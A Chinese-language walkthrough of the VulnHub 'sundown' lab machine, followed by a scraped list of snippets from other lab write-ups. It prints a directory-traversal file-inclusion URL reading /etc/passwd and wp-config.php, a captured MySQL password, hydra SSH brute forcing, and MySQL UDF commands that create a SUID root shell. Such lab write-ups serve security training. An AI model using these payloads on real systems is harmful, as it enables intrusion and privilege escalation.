vulnhub:sundown靶机
kali:192.168.111.111
靶机:192.168.111.154
信息收集
端口扫描
![](/assets/blank.gif)
访问web发现是wordpress
![](/assets/blank.gif)
使用wpscan扫描,发现插件:wp-with-spritz
![](/assets/blank.gif)
该插件存在存在文件包含漏洞
/usr/share/exploitdb/exploits/php/webapps/44544.php
![](/assets/blank.gif)
漏洞利用
读取/etc/passwd文件
http://192.168.111.154/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd
![](/assets/blank.gif)
使用hydra爆破ssh
![](/assets/blank.gif)
进入网站根目录发现只能以www-data读取里面的文件
![](/assets/blank.gif)
文件包含wordpress配置文件获得mysql账号密码 root:VjFSQ2IyRnNUak5pZWpCTENnPT0K
http://192.168.111.154/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../var/www/html/wordpress/wp-config.php
![](/assets/blank.gif)
提权
mysql udf提权
使用scp命令上传lib_mysqludf_sys_64.so到目标的/tmp目录
scp /usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.so carlos@192.168.111.154:/tmp
登录MySQL数据库执行以下命令
#mysql必须要以root身份运行
ps -aux | grep mysql#当secure_file_priv的值没有具体值时,表示不对 mysqld 的导入|导出做限制
show global variables like '%secure%';#查看插件所在路径
show variables like '%plugin%';#创建数据表a
create table a(line blob);#往表a插入数据
insert into a values(load_file('/tmp/lib_mysqludf_sys_64.so'));#插入二进制数据, 然后利用dumpfile函数把文件导出
select * from a into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys_64.so';#创建自定义函数sys_exec 类型是integer,别名 soname 文件名
create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so';#调用自定义函数执行命令
select sys_exec('cp /bin/bash /tmp/bash;chmod 4777 /tmp/bash');#退出数据库执行命令
/tmp/bash -p
获得flag
![](/assets/blank.gif)
vulnhub:sundown靶机相关推荐
- VulnHub - Pluck靶机
VulnHub - Pluck靶机 arp-scan -l 探测靶机地址 nmap -sV -Pn -A x.x.x.230 dirb http://x.x.x.230 扫描目录 发现index.ph ...
- vulnhub——Earth靶机
一.概要 攻击机:192.168.60.148 靶机:192.168.60.174 靶机下载地址:https://download.vulnhub.com/theplanets/Earth.ova.t ...
- vulnhub——ICA1靶机
一.概要 靶机:192.168.1.103 攻击机:192.168.1.101 靶机下载地址:https://download.vulnhub.com/ica/ica1.zip 参考文章:https: ...
- VulnHub DC1靶机渗透测试
1. 说明 虚拟机环境为VM VirtualBox2. 靶机下载地址:https://www.vulnhub.com/entry/dc-1,292/ 靶机:DC1 攻击机:kali 攻击目标:5个fl ...
- 【vulnhub】靶机- [DC系列]DC9(附靶机))
主机信息 Kali:192.168.56.113 DC9:192.168.56.112 实验过程 先进行主机探测,查找靶机的IP地址: arp-scan --interface eth1 192.16 ...
- vulnhub:Typo靶机
kali:192.168.111.111 靶机:192.168.111.163 信息收集 端口扫描 nmap -A -v -sV -T5 -p- --script=http-enum 192.168. ...
- vulnhub——oscp靶机
一.概要 攻击机:192.168.60.148 靶机:192.168.60.172 二.主机发现 两种方法: 1.nmap扫描网段下主机 前提是知道靶机跟自己在同一C段,这里用的是虚拟机NAT模式,所 ...
- vulnhub:DC1靶机
一.主机扫描 扫描ip 查看开放的端口 开启了22.80.111.53567端口.还有操作系统的信息 二.信息收集 先去看看80端口的情况 利用Firefox的Wappalyzer插件发现管理系统为D ...
- vulnhub Breakout靶机渗透
环境安装好后主页面有ip ip:192.168.171.214 1.信息收集 1.1.1nmap扫描端口 nmap -sV -p- -A -sC 192.168.171.214 在80端口源代码中找到 ...
最新文章
- 警惕企业中的五种虚假执行力
- C#编码标准--编码习惯
- 职责链模式里面必须要知道的事情
- Markdwon中多张图片的并排显示(Mardown的灵动使用技巧)
- centos7安装redmine3.4
- 老平台已死,整理个文档留下做纪念
- spring boot整合mybatis步骤
- 干货:MySQL 索引原理及慢查询优化
- MYSQL--事务处理
- First C program
- [LeetCode] 143. Reorder List_Middle tag: Linked List
- python安装(不影响系统自带python)
- 计算机数据结构模拟试题,十套计算机数据结构试题及答案.doc
- 网络技术-Cisco路由器
- w10怎样关闭对计算机更改,W10电脑系统自动更新怎么关闭
- 计算机编码器的工作原理,优先级编码器74LS148的电路结构、工作原理及使用方法...
- 计算机技术与软件专业技术资格哪个好考,计算机技术与软件专业技术资格好考吗?考试时间?...
- ajax 发送 put 请求
- 怎样辨别光模块的真假?
- 计算机网路基础课后习题答案 主编刘建友
热门文章
- c语言error c4996,C++解决error C4996报错
- boost.compute使用gpu计算(c++)
- Chrome同时登录一个网站的多个账号
- hog 行人检测 matlab,hog+svm_行人检测matlab程序
- 陌陌联手JusTalk Cloud 对讲社交app新风尚
- 论文精读|大规模双样学习用于人证比对
- c++ thread 带参数编译错误:/usr/include/c++/4.8/functional:1697:61: error: no type named ‘type’ in ‘class st
- 【Wwise】Wwise嵌入Unity后打包出现没有声音问题
- 修改手机IP地址方法
- 吉时利Keithley静电计6517B|6514上位机控制软件NS-EM